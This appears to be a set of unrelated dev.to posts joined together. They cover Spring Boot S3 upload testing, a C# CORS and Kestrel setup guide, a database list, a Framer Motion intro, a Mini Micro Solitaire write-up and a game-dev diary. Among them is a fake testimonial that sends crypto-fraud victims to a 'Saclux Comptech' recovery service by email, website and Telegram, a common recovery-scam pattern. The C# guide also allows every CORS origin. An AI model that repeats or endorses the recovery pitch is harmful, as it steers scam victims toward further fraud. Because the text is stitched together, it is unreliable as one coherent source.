{% embed https://dev.to/jordihofc/desvendando-o-segredo-como-implementar-file-upload-com-spring-boot-e-amazon-s3-1jd1 %}
Após publicar o artigo, percebi que diversas pessoas tinham dúvidas de quais os possíveis caminhos para escrever testes que tragam segurança e confiabilidade para o File Upload.
Dado a isso, hoje vamos bater um papo sobre como podemos evoluir a estratégia de testes, partindo dos testes unitários até os queridos testes de integração.
OBS: A escolha da estratégia de testes pode variar dado contexto, como, por exemplo, familiaridade da equipe com tecnologia, conhecimento técnico, limitação do ambiente, etc.
## Escrevendo Testes de Unidade
Essa é de longe a estratégia mais utilizada pelos Dev's e Empresas, e seu principal objetivo é validar se cada pedaço de código isolado funciona como esperado. Então é comum que nessa técnica as características estruturais do código sejam validadas, esta técnica é indicada para sistemas que possuem logicas complexas, como, por exemplo: cálculo de juros, folha de ponto, e qualquer outro sistema que possua logica com alto uso de estrutura de decisão e repetição.
Outro ponto interessante sobre os testes de unidade, é que como seu objetivo é validar a menor unidade de código possível, normalmente quando a classe ou método que esta sendo testado possui dependências internas ou externas costuma-se simular esse comportamento, e isso é o que chamamos de Mock's ou Dublê. Normalmente quando se escreve testes desta categoria, utilizamos ferramentas como JUnit, Hamcrast, assertJ e Mockito.
### Vamos ver como funciona na prática
Antes de iniciar a construção do teste, vamos relembrar o código de produção, que foi divido em duas classes, a classe _FileUpload_ representa o arquivo que será armazenado no S3, e _FileStorageService_ que representa o serviço que se integrará com Amazon S3 e fará o upload dos arquivos.
```java
public record FileUpload(MultipartFile data){}
@Service
public class FileStorageService {
@Autowired
private S3Template template;
private String bucket = "myBucketName";
public String upload(FileUpload fileUpload) {
try (var file = fileUpload.data().getInputStream()) {
String key = UUID.randomUUID().toString();
S3Resource uploaded = template.upload(bucket, key, file);
return key;
} catch (IOException ex) {
throw new RuntimeException("Não foi possivel realizar o upload do documento");
}
}
}
```
O código acima pode ser resumido em, inicialmente, o método `upload()` recebe uma instância da classe _FileUpload_ que carrega um _MultipartFile_ recebido mediante uma chamada HTTP. Em seguida, o arquivo a ser salvo no bucket, é aberto dentro do _**try-with-resources**_, caso alguma exceção seja lançada na abertura do arquivo, a mesma é tratada, e a streaming de dados é fechada automaticamente, causando a interrupção da execução do método. Caso contrário é criado uma chave de acesso ao arquivo, e envia respectivamente o arquivo para o Amazon S3, finalizando o método retornando sua chave de acesso.
```java
@ExtendWith(MockitoExtension.class)
class FileStorageServiceUnitTest {
@Mock
private S3Template s3Template;
@Mock
private MultipartFile file;
@Mock
private S3Resource uploaded;
private String bucketName = "myBucketName";
@Test
@DisplayName("Deve fazer o upload de um arquivo")
void t0() {
//cenario
FileUpload fileUpload = new FileUpload(file);
FileStorageService fileStorageService = new FileStorageService(s3Template, bucketName);
when(s3Template.upload(any(), any(), any())).thenReturn(uploaded);
//acao
String acesseKeyFile = fileStorageService.upload(fileUpload);
//validacao
assertNotNull(acesseKeyFile);
}
}
```
Iniciamos a escrita dos testes unitários, definindo a classe que será responsável por agrupar os casos de testes, a mesma deve ser preparada para oferecer suporte a execução do Mockito junto a ferramenta JUnit. Dado a isso, o primeiro passo será anotar a classe com `@ExtendWith(MockitoExtension.class)`, que permitirá a definição de dubles (_Mocks_) através das anotações `@Mock` e `@Spy`. Em seguida cuidamos de provisionar as dependências do _S3Template_ e _MultipartFile_, como não iremos provisionar o contexto do Spring, precisaremos definir os comportamentos das mesmas, então definimos as mesmas como _Mocks_, anotando previamente cada atributo com `@Mock`. Também iremos precisar de simular a resposta do _S3Template_, que retorna um objeto do tipo _S3Resource_, então também declaramos um atributo previamente anotado com `@Mock`.
O próximo passo é a definição do nosso caso de teste, então separamos o testes em 3 etapas, sendo elas: **cenário**, **ação** e **validação**. Na etapa **cenário** vamos definir as dependências que o teste precisa para executar, então é inicialmente criado uma instância do _FileUpload_, que recebe o duble do _MultipartFile_ que definimos anteriormente. Como o _FileStorageService_ executa o método `upload()` do `S3Template` precisamos definir este comportamento através da API de _When_ do Mockito, que cria um gatilho para que **Quando** o método `s3Template.upload()` seja chamado, com qualquer entrada, o objeto _S3Resource_ seja retornado na resposta. Por fim, instanciamos a _FileStorageService_ que recebe via construtor o nome do bucket e o duble do _S3Template_.
Já na etapa de **ação**, é onde vamos executar o nosso código de produção para colher o resultado e aplicar uma validação de modo a garantir que o resultado é equivalente ao esperado. Então simplesmente invocamos o método `fileStorageService.upload()` e armazenamos sua resposta a fim de executar as validações na próxima etapa. Na etapa de **validação**, vamos validar se realmente existe uma chave de acesso ao recurso criado, e para isso utilizaremos o `assertNotNull` já que a criação da chave de acesso não está em nosso controle.
### Ai eu te pergunto, como esse teste me ajuda a garantir que o _FileUpload_ funciona como deveria?
Em suma, esse teste ajuda muito pouco a trazer segurança e qualidade ao desenvolvimento da funcionalidade, já que o mesmo, busca cobrir apenas características estruturais do código, como operadores If, Else, For, Try, entre outros. Sem falar que um teste de unidade, toda execução é feita em memória, o que torna o extremamente rápido, porém, como nem tudo são flores, deixamos de validar toda a configuração da integração com Spring Cloud AWS e Amazon S3. Sem falar que a integração propriamente dita nem é executada, podendo ocasionar em erros não esperados durante a execução em produção.
A solução para o problema descrito acima, é aproximar o cenário do teste ao ambiente de produção, e a boa notícia é que o Spring Test fornece uma ampla gama de ferramentas que permitem executar o contexto do framework e se integrar a containers e dependências externas, como eu disse em:
{% embed https://dev.to/jordihofc/3-dicas-para-criar-uma-estrategia-moderna-de-testes-para-microsservicos-spring-boot-49a5 %}
### Evoluindo para um Teste de Integração com Spring Test, Test Containers e LocalStack
Antes de sair modificando o teste, precisamos adequar nossas dependências, então já adicione em sua ferramenta de build, as dependências de Spring Test Containers, TestContainers JUnit e LocalStack.
```JAVA
@SpringBootTest
@Testcontainers
@ActiveProfiles("test")
class FileStorageServiceTest {
@Autowired
private S3Template s3Template;
@Value("${s3.bucket.name}")
private String bucketName;
@Value("classpath:uploads/file.txt")
private Resource file;
@Autowired
private FileStorageService fileStorageService;
@Container
static LocalStackContainer LOCALSTACK_CONTAINER = new LocalStackContainer(
DockerImageName.parse("localstack/localstack")
).withServices(S3);
@DynamicPropertySource
static void registerS3Properties(DynamicPropertyRegistry registry) {
registry.add("spring.cloud.aws.endpoint",
() -> LOCALSTACK_CONTAINER.getEndpointOverride(S3).toString());
registry.add("spring.cloud.aws.region.static",
() -> LOCALSTACK_CONTAINER.getRegion().toString());
registry.add("spring.cloud.aws.credentials.access-key",
() -> LOCALSTACK_CONTAINER.getAccessKey().toString());
registry.add("spring.cloud.aws.credentials.secret-key",
() -> LOCALSTACK_CONTAINER.getSecretKey().toString());
}
@BeforeEach
void setUp() {
s3Template.createBucket(bucketName);
}
@AfterEach
void tearDown() {
s3Template.deleteBucket(bucketName);
}
@Test
@DisplayName("Deve fazer o upload de um arquivo")
void t0() throws IOException {
//cenario
MockMultipartFile fileRequest = new MockMultipartFile("data", file.getInputStream());
FileUpload fileUpload = new FileUpload(fileRequest);
//acao
String keyAcessResource = fileStorageService.upload(fileUpload);
//validacao
assertTrue(s3Template.objectExists(bucketName, keyAcessResource));
s3Template.deleteObject(bucketName, keyAcessResource);
}
}
```
A primeiro momento, precisamos adaptar nossa classe de testes, para suportar a inicialização do _ApplicationContext_ do Spring. Também é necessário que as configurações referentes ao ambiente de teste sejam aplicadas, então anotaremos a classe com `@SpringBootTest` e `@ActiveProfiles("test")`. Em seguida, vamos indicar para o JUnit que essa classe de teste faz o uso de containers gerenciados pelo TestContainers, então adicionamos a anotação `@Testcontainers` sobre a assinatura da classe.
O próximo passo, é indicar as dependências que utilizaremos durante a escrita do teste, para este caso, iremos precisar obter do _ApplicationContext_ instâncias do _S3Template_, _FileStorageService_, então utilizaremos a injeção de dependências via campo, anotando os atributos previamente com `@Autowired`. E para finalizar esta etapa, colheremos a propriedade: `s3.bucket.name` para obter o nome do bucket.
E também iremos colher o arquivo que será enviado ao bucket, então anotaremos os campos, _file_ e _bucketName_ respectivamente com a anotação `@Value`.
Na etapa atual, nosso objetivo é criar a infraestrutura necessária para que o JUnit seja capaz de instanciar um container da LocalStack, expondo o serviço do Amazon S3, e em seguida integrando o mesmo no _ApplicationContext_. A primeiro momento iremos definir o container, através da abstração _LocalStackContainer_, como desejamos que o JUnit gerencie o ciclo de vida do container, anotaremos este atributo com `@Container`. Por fim, não menos importante, vamos conectar o S3 a Aplicação através do método `registerS3Properties()` que cuida, de atualizar os valores das properties de conexão com os dados do container.
Após preparar a aplicação para simular o cenário mais próximo de produção possível, podemos partir para escrita dos testes. Lembramos que uma característica essencial dos testes é que devem garantir o isolamento um dos outros. Então como boa prática, foi definido os métodos `setUp()` e `tearDown()`, que irão auxiliar na construção e destruição do ambiente para cada caso de teste. O método `setUp()` está previamente anotado com `@BeforeEach` para ser executado antes de cada teste e crie o bucket com nome definido. Já o método `tearDown()` está anotado com `@AfterEach` para ser executado ao fim de cada teste, destruindo o bucket criado anteriormente.
Por fim, iniciaremos a construção do nosso teste de integração, então ao dividiremos o teste, nas queridas etapas de **cenário**, **ação** e **validação**. No **cenário**, criaremos um objeto do tipo _MockMultipartFile_ informando o nome do campo, e o file obtido no _classpath_ anteriormente. Por fim, instanciamos um _FileUpload_ recebendo o _MultipartFile_ criado. Na etapa de **ação**, invocamos o serviço de storage e realizamos o upload do arquivo, recebendo como retorno a sua chave de acesso. já na etapa de **validação**, podemos validar se o arquivo realmente existe no bucket, garantindo assim o comportamento esperado nosso serviço, através da validação do efeito colateral. Você pode ter mais detalhes do código neste [repositório](https://github.com/JordiHOFC/sample-storage-file-with-spring-aws-s3).
## Conclusão
Durante este artigo podemos observar que existem diversas estratégias para escrita de testes em um sistema que realizar o upload de arquivos em um bucket do S3. E que ao fazer escolha de uma estratégia de testes, devemos avaliar antes, as limitações que o ambiente nós trazemos, o nível de competência da equipe com as ferramentas e até mesmo o tempo disponível para uma determinada entrega.
Também foi discutido como os testes unitários favorecem uma cobertura de características relacionadas a estrutura do código, e são ótimos validadores da escrita de lógicas que se baseiam em estruturas de decisão, controle, repetição. Porém, são péssimos candidatos a cobertura de características que estejam relacionadas as operações de I/O, já que por natureza todo teste de unidade é rodado em memória e normalmente possuem alto uso de mocks, que evitam o comportamento real do sistema.
Sendo assim, uma estratégia interessante para contexto onde a maioria das operações são de I/O é o uso de testes de integração, já que os mesmos, se aproximam do cenário de produção, permitindo a antecipação de erros e bugs, que poderiam ser descobertos nas etapas de CI e CD e pelo usuário final do sistema.
Agora me diz você, qual estratégia faz mais sentido em seu contexto? Deixe nos comentários.
Não se esqueça de me seguir nas redes sociais para receber mais dicas sobre Engenharia de Software e Desenvolvimento Backend.
[Linkedin](https://www.linkedin.com/in/jordihofc)
[Twitter](https://twitter.com/JordihSilva)
[Instagram](https://www.instagram.com/silvah.jordi/)
| jordihofc |
1,917,873 | How can i recover my lost bitcoin investment from fake online investment | I will forever be grateful to Saclux Comptech Specialst. I almost lost my life after falling victim... | 0 | 2024-07-09T23:18:25 | https://dev.to/charlotte_hannahleia_e5e/how-can-i-recover-my-lost-bitcoin-investment-from-fake-online-investment-58h5 | bitcoin, cryptocurrency, softwaredevelopment, news | I will forever be grateful to Saclux Comptech Specialst. I almost lost my life after falling victim to a scam that went on for weeks, I got contacted by a man on Linkedin pretending to be a Forex trader investor, and he told me I’d make huge profits if I invested on his platform not knowing that I was being targeted, He had lured me in with enticing promises and guarantees, and I fell victim to his deceitful tactics not knowing it was scam.
After realizing that I had been scammed, I felt a deep sense of despair and hopelessness. But then, I found a testimonial from Saclux Comptech Specialst on Reddit about how they recovered lost digital currency to scam victims, so I grabbed the opportunity quickly and contacted them. Their experts used advanced techniques and cutting-edge technology to trace and recover my funds. They worked tirelessly to ensure I received my digital currency back, and their dedication paid off.
Thanks to their efforts, I was able to recover a significant portion of my lost digital currency. I'm grateful for their assistance and highly recommend their services to anyone facing a similar situation. Don't lose hope if you've lost your digital currency – there are resources available to help you recover your funds. Take action, and don't let lost crypto investment or corrupted wallets get in the way of reclaiming your digital assets!" Reach out to Them via the information below
Email: sacluxcomptechspecialst@engineer.com
Website: https://sacluxcomptechspecialst.com/
Telegram: SacluxComptechTeam
| charlotte_hannahleia_e5e |
1,917,878 | Liberar consumo de API C# | Apesar de parecer simples liberar API para uso no visual studio, no meu caso sempre veio com algum... | 0 | 2024-07-09T23:55:22 | https://dev.to/nathanndos/liberar-consumo-de-api-c-48j6 | Apesar de parecer simples liberar API para uso no visual studio, no meu caso sempre veio com algum problema que fizesse com que desse erro nas requisições pelo postman, dispositivo móvel ou por algum projeto.
Dito isso, eu fiquei quebrando cabeça pra resolver e abaixo eu listei algumas coisas que podem resolver esse problema.
## CORS #1
A primeira coisa a ser feita é liberar o CORS(lá ele), mas antes vamos entender o que é e como funciona.
#### O que é?
CORS significa Cross-Origin Resource Sharing que consiste em um mecanismo que permite aplicações web façam requisições para um servidor em outro domínio além da aplicação que está hospedada.
#### Como funciona?
Em resumo, o CORS funciona como um validador de origem, afim de garantir segurança do usuário.
#### Algumas configurações
- Access-Control-Allow-Origin: Especifica quais origens podem acessar os recursos.
- Access-Control-Allow-Methods: Especifica quais métodos HTTP (GET, POST, etc.) são permitidos para a requisição.
- Access-Control-Allow-Headers: Especifica quais cabeçalhos HTTP podem ser usados na requisição.
- Access-Control-Allow-Credentials: Indica se os cookies e credenciais HTTP podem ser incluídos na requisição (usado em requisições com credenciais, como cookies de autenticação).
### Resolução
No arquivo program.cs da API no visual Studio larga o seguinte código, só confere antes se você já não tinha adicionado algo antes:
`var builder = WebApplication.CreateBuilder(args);
builder.Services.AddControllers();
https://aka.ms/aspnetcore/swashbuckle
builder.Services.AddEndpointsApiExplorer();
builder.Services.AddSwaggerGen();
builder.Services.AddCors(options =>
{
options.AddPolicy("AllowAll",
builder =>
{
builder.AllowAnyOrigin()
.AllowAnyMethod()
.AllowAnyHeader();
});
});
var app = builder.Build();
// Configure the HTTP request pipeline.
if (app.Environment.IsDevelopment())
{
app.UseSwagger();
app.UseSwaggerUI();
}
app.UseHttpsRedirection();
app.UseCors("AllowAll");
app.UseAuthorization();
app.MapControllers();
app.Run();
`
## Kestrel #2
Antes de fazer este passo recomendo que faça o passo anterior e teste
#### O que é?
Kestrel é um servidor integrado fornecido pelo ASP.NET Core e responsável por processar as requisições HTTP.
#### Como funciona?
Este servidor funciona otimizando e organizando as requisições que são feitas, a partir das configurações de porta, Ip e certificados SSL. Além disso, é importante que destacar que é multiplataforma.
#### Resolução
A configuração abaixo deve ser feita dentro do arquivo appsettings.json, sendo HTTP e/ou HTTPs. Lembrando que a porta vai alterar de acordo com o que você usa.
`{
"Logging": {
"LogLevel": {
"Default": "Information",
"Microsoft.AspNetCore": "Warning"
}
},
"AllowedHosts": "*",
"Kestrel": {
"Endpoints": {
"Http": {
"Url": "http://0.0.0.0:5111"
},
"Https": {
"Url": "https://0.0.0.0:5001",
"Certificate": {
"Path": "certificate.pfx",
"Password": "password"
}
}
}
}
}
`
## Liberando portas no firewall
Siga os prints abaixo. Lembrando que faremos isso pra entrada e para saida.
#### Entrada





#### Saída




| nathanndos | |
1,917,880 | List of 45 databases in the world | Under the Hood Let’s not waste time here is the list of all databases SQL... | 0 | 2024-07-09T23:34:04 | https://dev.to/shreyvijayvargiya/list-of-45-databases-in-the-world-57e8 | database, vectordatabase, fauna, mongodb | Under the Hood
--------------
Let’s not waste time here is the list of all databases
SQL Databases
-------------
### Traditional RDBMS
* [PostgreSQL](https://www.postgresql.org/) — Advanced, open-source relational database known for its reliability, feature robustness, and performance.
* [Oracle](https://www.oracle.com/database/) — Widely used commercial relational database management system known for its scalability and enterprise features.
* [MySQL](https://www.mysql.com/) — Popular open-source relational database known for its speed and reliability.
* [SQLite](https://www.sqlite.org/) — Lightweight, disk-based database that’s self-contained and serverless.
* [Microsoft SQL Server](https://www.microsoft.com/en-us/sql-server/) — Commercial relational database by Microsoft, known for its ease of integration with other Microsoft products.
* IBM DB2 — IBM’s enterprise database known for its advanced data management capabilities.
* [Amazon RDS](https://aws.amazon.com/rds/) — Managed relational database service by AWS supporting several database engines including MySQL, PostgreSQL, and Oracle.
### Modern SQL DBs
* [CockroachDB](https://www.cockroachlabs.com/) — Distributed SQL database built for cloud applications.
* [VoltDB](https://www.voltdb.com/) — High-performance in-memory SQL database.
* [Supabase](https://supabase.com/) — Open-source Firebase alternative, offers a backend as a service built on PostgreSQL.
* [YugabyteDB](https://www.yugabyte.com/) — Distributed SQL database for high-performance and cloud-native applications.
* [Timescale](https://www.timescale.com/) — Open-source time-series SQL database optimized for fast ingest and complex queries.
* [PlanetScale](https://planetscale.com/) — Serverless database platform built on MySQL and Vitess.
* [Neon](https://neon.tech/) — Serverless PostgreSQL platform built for the cloud.
### NoSQL Databases
#### Document
* [CouchDB](https://couchdb.apache.org/) — Database that uses JSON to store data and JavaScript for MapReduce queries.
* [MongoDB](https://www.mongodb.com/) — Document database known for its flexibility and scalability.
* [Amazon DocumentDB](https://aws.amazon.com/documentdb/) — Managed MongoDB-compatible database service by AWS.
* [Azure Cosmos DB](https://azure.microsoft.com/en-us/services/cosmos-db/) — Globally distributed, multi-model database service by Microsoft.
* Cloud Firestore — Scalable and flexible NoSQL cloud database to store and sync data for client- and server-side development.
### Graph
* [Dgraph](https://dgraph.io/) — Distributed, fast graph database.
* [Neo4j](https://neo4j.com/) — Leading graph database platform, known for its performance and scalability.
* [ArangoDB](https://www.arangodb.com/) — Native multi-model database supporting graph, document, and key-value data models.
* [Memgraph](https://memgraph.com/) — Real-time graph database for streaming data.
### Vector
* [Pinecone](https://www.pinecone.io/) — Vector database for machine learning and AI applications.
* [Milvus](https://milvus.io/) — Open-source vector database for AI and machine learning.
* [Weaviate](https://www.semi.technology/) — Open-source vector search engine.
### Time-Series
* [InfluxDB](https://www.influxdata.com/) — Open-source time-series database.
* [DolphinDB](https://www.dolphindb.com/) — High-performance time-series database.
* [TimescaleDB](https://www.timescale.com/) — PostgreSQL extension for time-series data.
* [Prometheus](https://prometheus.io/) — Open-source systems monitoring and alerting toolkit.
### Search
* [Elastic](https://www.elastic.co/) — Search engine based on the Lucene library.
* [Algolia](https://www.algolia.com/) — Hosted search API that provides fast and relevant search results.
* [Meilisearch](https://www.meilisearch.com/) — Open-source search engine that is fast and relevant out of the box.
* [Solr](https://solr.apache.org/) — Open-source search platform built on Apache Lucene.
### Key-Value
* [Redis](https://redis.io/) — In-memory data structure store, used as a database, cache, and message broker.
* [Memcached](https://memcached.org/) — High-performance distributed memory object caching system.
* [Amazon DynamoDB](https://aws.amazon.com/dynamodb/) — Fully managed proprietary key-value and document database by AWS.
* [KeyDB](https://keydb.dev/) — High-performance fork of Redis with multithreading.
### Multi-Model
* [ArangoDB](https://www.arangodb.com/) — Native multi-model database supporting graph, document, and key-value data models.
* [Fauna](https://fauna.com/) — Distributed, serverless database with document, graph, and relational models.
* [SurrealDB](https://surrealdb.com/) — Multi-model database for the cloud, edge, and IoT.
### Wide Column
* [Apache Cassandra](https://cassandra.apache.org/) — Distributed NoSQL database
* [HBase](https://hbase.apache.org/) — Distributed, scalable, big data store.
* [ScyllaDB](https://www.scylladb.com/)
* [Datastax](https://www.datastax.com/)
That's it, see you in the next one
Shrey | shreyvijayvargiya |
1,917,881 | Framer Motion | Giriş - Part 1 | Nedir ? Framer Motion, React uygulamalarında kolayca animasyon yapmanızı sağlayan bir kütüphanedir.... | 0 | 2024-07-10T00:08:55 | https://dev.to/boraacici/framer-motion-giris-part-1-1a8j | react, javascript, tutorial, webdev | **Nedir ?**
Framer Motion, React uygulamalarında kolayca animasyon yapmanızı sağlayan bir kütüphanedir. Geçiş ve sürükleme gibi animasyon efektleri eklemek için kullanılır.
**Kim Tarafından Oluşturulmuştur ?**
Framer firması tarafından oluşturulmuştur. Framer, özellikle kullanıcı arayüzü (UI) tasarımı ve prototipleme araçları geliştiren bir şirkettir.
**Nasıl Kurulur ?**
Framer React 18 ve üst versiyonlarını destekler. Npm üzerinden yüklemek için aşağıdaki komut çalıştırılır.
```
npm install framer-motion
```
Framer motion kütüphanesinin herhangi bir bağımlılığı yoktur ve tek paket ile uygulamaya başlayabilirsiniz.


Framer motion güncel olarak (10.07.2024) npm üzerinden yaklaşık 3,4 milyon haftalık indirilme ve github üzerinde 22700 star sayısı ile birlikte kullanıcıları tarafından ciddi bir beğeni kazandığını göstermiştir.
**Kullanım**
İsteğiniz component içerisinde _**framer-motion**_ kütüphanesinden **_motion_** objesini import edip herhangi bir html ya da svg elementi için bir motion bileşenini ekleyebilirsiniz.
```jsx
import { motion } from "framer-motion";
export default function App() {
return <motion.div />;
}
```
| boraacici |
1,917,882 | The Making of Solitaire for Mini Micro | Over the weekend I got the urge to create a Solitaire card game for Mini Micro. I completed it... | 0 | 2024-07-10T16:28:51 | https://dev.to/joestrout/the-making-of-solitaire-for-mini-micro-19hf | miniscript, minimicro, programming, gamedev | Over the weekend I got the urge to create a Solitaire card game for [Mini Micro](https://miniscript.org/MiniMicro/). I completed it Sunday night, the day after I started it. You can play it [here](https://joestrout.itch.io/solitaire), or download the source code [from GitHub](https://github.com/JoeStrout/ms-solitaire) and play it in your own copy of Mini Micro.
Let's take a look at the code, and see what you could apply to your own card games.
## Project Organization
If you go to the [repo](https://github.com/JoeStrout/ms-solitaire), you'll find three MiniScript (.ms) files:
- [solitaire.ms](https://github.com/JoeStrout/ms-solitaire/blob/main/solitaire.ms): this is the game itself.
- [title.ms](https://github.com/JoeStrout/ms-solitaire/blob/main/title.ms): this is the title screen/main menu.
- [startup.ms](https://github.com/JoeStrout/ms-solitaire/blob/main/startup.ms): this literally just runs _title.ms_ (automatically when Mini Micro boots).
This is a pretty common organization for smallish games. Develop your game as a stand-alone program in one file (or split it into multiple files, if it's getting big or unwieldy). Then write another script for the title screen and main menu. This should run the game file (_solitaire_ in this case) when the user clicks "Play", and conversely, modify your game script so that when the game is over, it runs the title script.
And finally, to ensure your game launches automatically when Mini Micro starts up, make a tiny _startup.ms_ script that just runs your title script.
## Building on CardSprite
There is a "cardFlip" demo included with Mini Micro. You can try it [here](https://miniscript.org/MiniMicro/index.html?cmd=run%20%22%2Fsys%2Fdemo%2FcardFlip.ms%22). Clicking the card causes it to flip over, and pressing the left/right arrow keys rotates it.

When a card flips over, it does a neat 3D effect, with a proper perspective distortion during the flip.

This requires some fairly complex math and some advanced features of Mini Micro's [Sprite class](https://miniscript.org/wiki/Sprite). Who wants to rewrite all that?
Fortunately, you don't have to! The cardFlip demo, like several others in the /sys/demo directory, is written in such a way that it can be used as an import module. You can tell this by pressing Control-C to break out of the demo, `edit`ing the source, and scrolling to the bottom, where you will find:
```
if locals == globals then demo
```
This is a common way for a script to distinguish between when it is the main program — in which case, locals will indeed equal globals — and when it has been [import](https://miniscript.org/wiki/Import)ed by some other script, in which case these will be different. So this says, if this is the main program, go ahead and run the demo. If not, then the script defines its classes and helper methods and so on, but doesn't actually _do_ anything visible to the user.
In this case, what it defines is a `CardSprite` class, subclassed from [Sprite](https://miniscript.org/wiki/Sprite), which knows how to approach a "target" defined by:
1. Position on the screen
2. Sprite scale
3. Sprite rotation
4. Flip state (faceUp = true to face up, or false to face down).
It also has a `speed` map that controls how quickly it approaches each of those target properties. So just by changing the target, and then calling `update` on every frame, you can make a CardSprite move around the screen and flip up or down as desired.

But, this script lives in /sys/demo, which is not part of the standard importPaths. So how can we import it? The solution is just to check [`env`](https://miniscript.org/wiki/Env)`.importPaths`, and add /sys/demo if it's not already there.
```
if not env.importPaths.contains("/sys/demo") then
env.importPaths.push "/sys/demo"
end if
import "cardFlip"
```
(Note that `contains` is not a standard Mini Micro method, but something added by the **listUtil** module, which we already imported at the top of the program.)
So now that we've successfully imported cardFlip as a module, we can access and subclass `cardFlip.CardSprite`.
```
Card = new cardFlip.CardSprite
```
Much of the Solitaire is building out this class. We add convenience methods like `goToInSecs` and `goToAtSpeed` that let us more easily specify a target position and speed, to make cards fly around the screen in just the right way. We also add a `moveToFront` method that ensures the card is at the top of the sprite list, so it appears in front of all other cards. Finally, there are some Solitaire-specific methods added here, such as `canGoOnFoundation` and `canGoOnTab`, which check whether putting a card in a certain pile would be a legal move in the game.
## Using smaller/alternate cards
Mini Micro comes with a bunch of built-in [playing card images](https://github.com/JoeStrout/minimicro-sysdisk/tree/master/sys/pics/cards) which come from [Kenney's Boardgame Pack](https://kenney.nl/assets/boardgame-pack). I love these card images, and when I started the project my goal was to demonstrate a game made using only these built-in assets.
Halfway through development, I realized that they're just a smidge too big. The cards are 140 characters across, and in Klondike Solitaire, you need seven columns of cards with at least a little gap in between. 7 times 140 is 980 pixels, but our Mini Micro screen is only 960 pixels wide. I tried to cram them in anyway, but it didn't look great.

Of course all Mini Micro sprites can be scaled at runtime, and that includes these cards. But the scaling algorithm it uses is "nearest-neighbor", rather than some form of blending. This doesn't produce a very pretty result with text and sharp icons, like you find on playing cards, especially when using an odd scaling factor like 0.8.

I really wanted this game to look nice and polished. So, I went back to Kenney's pack, loaded the vector (SVG) card image, and re-exported everything at a smaller scale (120 pixels wide instead of 140). Then I updated the code to load from my custom pics directory, rather than /sys/pics/cards.
```
CARDPICS = "pics/cards-120/"
```
...
```
Card.image = file.loadImage(CARDPICS + "cardClubsA.png")
Card.localBounds.width = Card.image.width
Card.localBounds.height = Card.image.height
```
This included the code in the `createDeck` function that loaded all 52 cards:
```
Card.backImage = file.loadImage(CARDPICS + "cardBack_blue4.png")
outer.cards = cardDisp.sprites
// create the cards
ranks = ["A"] + range(2,10) + ["J", "Q", "K"]
for suit in "Clubs Diamonds Hearts Spades".split
for rank in ranks
card = new Card
card.speed = Card.speed + {}
card.frontImage = file.loadImage(CARDPICS + "card" + suit + rank + ".png")
card.rank = rank
card.rankVal = 1 + ranks.indexOf(rank)
card.suit = suit
card.red = (suit == "Diamonds" or suit == "Hearts")
card.black = not card.red
cards.push card
end for
end for
```
After those changes, everything else worked the same. You can see the difference if you click on the final image below, and compare it to the last one above.

If you're making your own Mini Micro card game, I encourage you to use the built-in cards if possible... but if you need slightly smaller ones, feel free to grab them from [my repo](https://github.com/JoeStrout/ms-solitaire/tree/main/pics/cards-120)!
## Card Management
Next, some general notes about how to manage a deck of cards in a game.
In Solitaire, I kept all the playing cards, and _only_ the playing cards, in one SpriteDisplay. I had another SpriteDisplay behind that for the wells (translucent dark areas indicating where you can pile up cards), and if I needed some UI elements (buttons etc.) on top of the cards, I would put those in a third SpriteDisplay above the cards. But having a display that's _just_ cards lets me make the sprite list and my "all cards in the game" list one and the same. This was actually accomplished in the deck-loading code above, where it says:
```
outer.cards = cardDisp.sprites
```
So now my rule is: never remove a card from this `cards` list, unless you immediately add it back. Removing a card from the list would remove it from the display, and also from the game. That would be appropriate in some kind of deck-building game where cards can be permanently removed from play, but for most card games, it's generally not something you want to do.
Then the gameplay consists of only moving these cards around on screen, arranging them in the desired order, and flipping them face-up or face-down. When you see something like a stack of cards for a draw pile, all the card sprites really are there — no need to get clever and try to remove the cards below the top one in the stack. Sprites are super efficient; Mini Micro can handle them all without breaking a sweat.
## Keeping Things Moving
The only other technique that seems noteworthy to me, is how I ensure that all the cards can continue moving towards their targets. This requires calling `update` on each card on every frame. So we start by making a function that does that for one frame:
```
updateCards = function
for sp in cardDisp.sprites
sp.update
end for
end function
```
But now, sometimes I want to wait a bit before doing something. For example, if playing the "hard" version of the game, cards are drawn 3 at a time. But I don't want to simultaneously draw 3 cards; I want to draw one, wait a bit, draw the second, wait a little more, and then draw the third.
If I just called the built-in `wait` function for these delays, it would cause the cards I've already drawn to freeze during the wait. That's no good! So, I made this function:
```
waitButUpdate = function(delay = 1)
t1 = time + delay
while time < t1
updateCards
yield
end while
end function
```
Now we can call `waitButUpdate`, which acts exactly like `wait`, except that during the delay, it updates the cards on every frame. Now my draw-three-cards code can do stuff like
```
card.goToInSecs x, WASTEPOS.y, 0.5
card.target.faceUp = true
card.moveToFront
waitButUpdate 0.25
```
and wait a quarter second for this card to start its flip, before proceeding to the next card.

## Conclusion
Making a card game in Mini Micro was a fun and easy project. Using the CardSprite class from /sys/demo/cardFlip, you can easily create very polished animations as your cards move around the table and flip over to face up or down. With the built-in card images, you can get started with most standard card games right away; but if you need to swap in a different set of cards, as I did here, that's easy enough to do.
Feel free to study and borrow from the Solitaire script for your own games, too. Many of the extensions made in its CardSprite subclass would be generally applicable to any card game. You can also see how I handled clicking and dragging cards with the mouse (see the `clickDragCard` function), and adapt it to your needs.
Since Mini Micro was released, I've been hoping to see people creating card games with it. There are [_so many_ classic card games](https://boardgamegeek.com/geeklist/42199/traditional-card-games-that-should-be-played-more), the rules of which are almost always in the public domain, and players for which can be hard to find when you get an urge to play. That makes them ripe opportunities for computer adaptations!
So, here's hoping my little Solitaire game — and this behind-the-scenes write-up — will inspire you. Let me know what you think in the comments below!
| joestrout |
1,917,883 | [Game of Purpose] Day 52 | Today I was working on making Manny go along the spline. And it is functioning somewhat... | 27,434 | 2024-07-09T23:38:30 | https://dev.to/humberd/game-of-purpose-day-52-50cj | gamedev | Today I was working on making Manny go along the spline. And it is functioning somewhat properly.
{% embed https://youtu.be/rfgzU8qpxWs %}
I am really considering moving some functions to C++. The reason is that the onse using multiple variables are really hard to read and write.
For example the one, which moves Manny along the spline is a huge spaghetti.

Notice 2 guarding ifs then execution and invoking event again. 15 lines in C++, easy stuff. However, in Blueprints it's REALLY hard to know what is going on without any comments.
| humberd |
